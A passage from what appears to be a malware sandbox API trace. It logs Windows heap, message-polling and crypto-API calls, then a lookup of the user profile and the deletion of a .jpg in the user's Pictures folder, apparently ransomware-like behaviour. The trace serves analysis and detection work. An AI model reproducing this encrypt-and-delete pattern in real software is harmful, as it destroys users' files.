wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0253.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0253.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0253.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0253.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0253.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0253.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54238 [0253.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0253.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0253.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0253.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0253.671] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0253.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0253.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0253.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0253.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0253.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0253.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0253.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0253.672] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0253.672] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54148 [0253.672] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0253.672] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0253.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54148 | out: hHeap=0x970000) returned 1 [0253.672] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0253.672] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51400 [0253.672] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0253.672] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0253.672] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ae8 [0253.672] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0253.672] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0253.746] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ae8 | out: hHeap=0x970000) returned 1 [0253.746] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0253.746] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e514f0 [0253.746] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0253.746] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0253.746] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0253.746] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0253.746] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0253.746] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0253.746] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69bc8 [0253.746] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69bc8 | out: hHeap=0x970000) returned 1 [0253.746] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0253.746] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0253.746] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0253.746] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e515b0 [0253.746] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0253.746] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e512e0 [0253.746] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e512c8 [0253.746] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51310 [0253.746] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544e0 [0253.746] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0253.746] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51580 [0253.746] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51358 [0253.746] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e513d0 [0253.747] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0253.747] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0253.747] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0253.747] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0253.747] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0253.747] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0253.747] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0253.747] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55dc0 [0253.747] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0253.747] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0253.747] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0253.747] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0253.747] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0253.748] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0253.748] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0253.748] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0253.748] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0253.748] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0253.748] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0253.748] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a48 [0253.748] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0253.748] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0253.748] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0253.748] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0253.748] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0253.748] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0253.748] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0253.748] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54238 [0253.748] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0253.748] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0253.748] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0253.748] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e56098 [0253.748] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0253.748] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0253.749] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0253.749] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0253.749] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0253.749] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0253.749] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0253.749] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0253.749] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55d50 [0253.749] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0253.749] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0253.749] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0253.749] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0253.749] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0253.749] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0253.749] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0253.749] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0253.749] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0253.749] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e56098 [0253.749] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0253.749] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0253.749] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0253.750] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0253.750] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0253.750] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0253.750] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0253.750] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0253.750] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0253.750] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0253.750] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0253.750] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0253.750] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0253.750] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0253.750] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0253.750] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a48 [0253.750] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x2e69a48, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0253.750] CryptReleaseContext (hProv=0xa5f958, dwFlags=0x0) returned 1 [0253.750] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x3bf0050 [0253.750] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0253.751] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0253.751] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ff0 | out: hHeap=0x970000) returned 1 [0253.751] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0253.751] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0253.751] FreeLibrary (hLibModule=0x756e0000) returned 1 [0253.751] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0253.751] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0253.751] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0253.751] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77788 | out: hHeap=0x970000) returned 1 [0253.751] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0253.751] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0253.751] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0253.751] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0253.751] CloseHandle (hObject=0x2d0) returned 1 [0253.751] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0253.751] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0253.751] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3be0048 | out: hHeap=0x970000) returned 1 [0253.754] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0253.754] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0253.754] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0253.754] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0253.754] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0253.754] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0253.754] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0253.754] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0253.754] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0253.755] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0253.755] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0253.755] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0253.755] CloseHandle (hObject=0x2a0) returned 1 [0253.756] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0253.756] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0253.756] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04008 | out: hHeap=0x970000) returned 1 [0253.758] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77ac8 | out: hHeap=0x970000) returned 1 [0253.758] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699a8 | out: hHeap=0x970000) returned 1 [0253.758] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0253.758] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0253.758] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0253.758] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0253.758] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0253.758] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0253.758] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0253.758] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0253.758] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542b0 | out: hHeap=0x970000) returned 1 [0253.758] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0253.758] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0253.758] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf560, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0253.759] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures/T9bmRc0wgjLMG_.jpg", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\T9bmRc0wgjLMG_.jpg", lpFilePart=0x8cedf4*="T9bmRc0wgjLMG_.jpg") returned 0x2b [0253.759] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0253.759] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\T9bmRc0wgjLMG_.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\t9bmrc0wgjlmg_.jpg")) returned 0x20 [0253.759] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\T9bmRc0wgjLMG_.jpg", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2355fcc0, ftCreationTime.dwHighDateTime=0x1d5f052, ftLastAccessTime.dwLowDateTime=0x691d95a0, ftLastAccessTime.dwHighDateTime=0x1d5eedc, ftLastWriteTime.dwLowDateTime=0x691d95a0, ftLastWriteTime.dwHighDateTime=0x1d5eedc, nFileSizeHigh=0x0, nFileSizeLow=0x577, dwReserved0=0x1, dwReserved1=0x1c, cFileName="T9bmRc0wgjLMG_.jpg", cAlternateFileName="T9BMRC~1.JPG")) returned 0xa87310 [0253.759] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\T9bmRc0wgjLMG_.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\t9bmrc0wgjlmg_.jpg")) returned 1 [0253.820] FindNextFileW (in: hFindFile=0xa87310, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2355fcc0, ftCreationTime.dwHighDateTime=0x1d5f052, ftLastAccessTime.dwLowDateTime=0x691d95a0, ftLastAccessTime.dwHighDateTime=0x1d5eedc, ftLastWriteTime.dwLowDateTime=0x691d95a0, ftLastWriteTime.dwHighDateTime=0x1d5eedc, nFileSizeHigh=0x0, nFileSizeLow=0x577, dwReserved0=0x1, dwReserved1=0x1c, cFileName="T9bmRc0wgjLMG_.jpg", cAlternateFileName="T9BMRC~1.JPG")) returned 0 [0253.820] FindClose (in: hFindFile=0xa87310 | out: hFindFile=0xa87310) returned 1 [0253.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0253.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0253.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0253.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0253.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0253.820] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0253.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0253.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0253.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0253.820] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf560, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0253.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0253.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0253.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0253.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0253.820] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b28 [0253.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51040 [0253.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e54858 [0253.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0253.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0253.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0253.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0253.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0253.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0253.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0253.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0253.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0253.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0253.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0253.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0253.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0253.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0253.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x58) returned 0x2e58910 [0253.821] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures/T9bmRc0wgjLMG_.jpg", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: 